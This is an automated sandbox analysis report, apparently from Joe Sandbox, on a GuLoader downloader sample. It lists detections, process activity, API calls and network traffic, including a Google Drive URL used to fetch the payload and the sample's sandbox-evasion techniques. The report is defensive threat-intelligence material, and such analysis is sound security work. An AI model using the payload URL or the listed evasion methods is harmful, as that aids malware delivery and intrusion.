Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4AMVusDMPP.exe

Overview

General Information

Sample name:4AMVusDMPP.exe
renamed because original name is a hash value
Original sample name:815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a.exe
Analysis ID:1588355
MD5:ed6f1c14e085e4fbc7c47f894f2140b9
SHA1:1757c800b765345d51a261e11ebe1d89f05c4865
SHA256:815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 4AMVusDMPP.exe (PID: 4492 cmdline: "C:\Users\user\Desktop\4AMVusDMPP.exe" MD5: ED6F1C14E085E4FBC7C47F894F2140B9)
    • 4AMVusDMPP.exe (PID: 4216 cmdline: "C:\Users\user\Desktop\4AMVusDMPP.exe" MD5: ED6F1C14E085E4FBC7C47F894F2140B9)
      • WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1732921065.0000000003541000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T01:15:33.617639+010028032702Potentially Bad Traffic192.168.2.1049708142.250.181.238443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 4AMVusDMPP.exeAvira: detected
    Source: 4AMVusDMPP.exeReversingLabs: Detection: 60%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 4AMVusDMPP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.10:49709 version: TLS 1.2
    Source: 4AMVusDMPP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: 6%%.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: HP[o0C:\Windows\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb;bK source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2139339750.0000000036130000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Desktop\4AMVusDMPP.PDB source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Configuration.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Xml.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: Microsoft.VisualBasic.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Windows.Forms.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: Microsoft.VisualBasic.pdb4AMVusDMPP.exe source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: mscorlib.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: mscorlib.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.pdbMZ source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: \??\C:\Users\user\Desktop\4AMVusDMPP.PDB- source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbhb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS query: name: checkip.dyndns.org
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49708 -> 142.250.181.238:443
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
    Source: 4AMVusDMPP.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 4AMVusDMPP.exe, 00000003.00000002.2138936838.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003258000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2117389730.0000000004B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7J
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/~
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
    Source: 4AMVusDMPP.exe, 00000003.00000003.1862365982.0000000003281000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download
    Source: 4AMVusDMPP.exe, 00000003.00000003.1834630972.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862431547.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862365982.0000000003281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=downloadT
    Source: 4AMVusDMPP.exe, 00000003.00000003.1834630972.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862431547.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1862365982.0000000003281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=downloadcn
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: 4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.10:49709 version: TLS 1.2
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00404DCC0_2_00404DCC
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00406AF20_2_00406AF2
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_6EAB1B5F0_2_6EAB1B5F
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00404DCC3_2_00404DCC
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00406AF23_2_00406AF2
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00162DD13_2_00162DD1
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: String function: 00402C41 appears 49 times
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536
    Source: 4AMVusDMPP.exe, 00000000.00000000.1439243978.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4AMVusDMPP.exe
    Source: 4AMVusDMPP.exe, 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4AMVusDMPP.exe
    Source: 4AMVusDMPP.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 4AMVusDMPP.exe
    Source: 4AMVusDMPP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal76.troj.evad.winEXE@4/13@3/3
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4216
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeFile created: C:\Users\user\AppData\Local\Temp\nsw3340.tmpJump to behavior
    Source: 4AMVusDMPP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 4AMVusDMPP.exeReversingLabs: Detection: 60%
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeFile read: C:\Users\user\Desktop\4AMVusDMPP.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"Jump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: rasman.dllJump to behavior
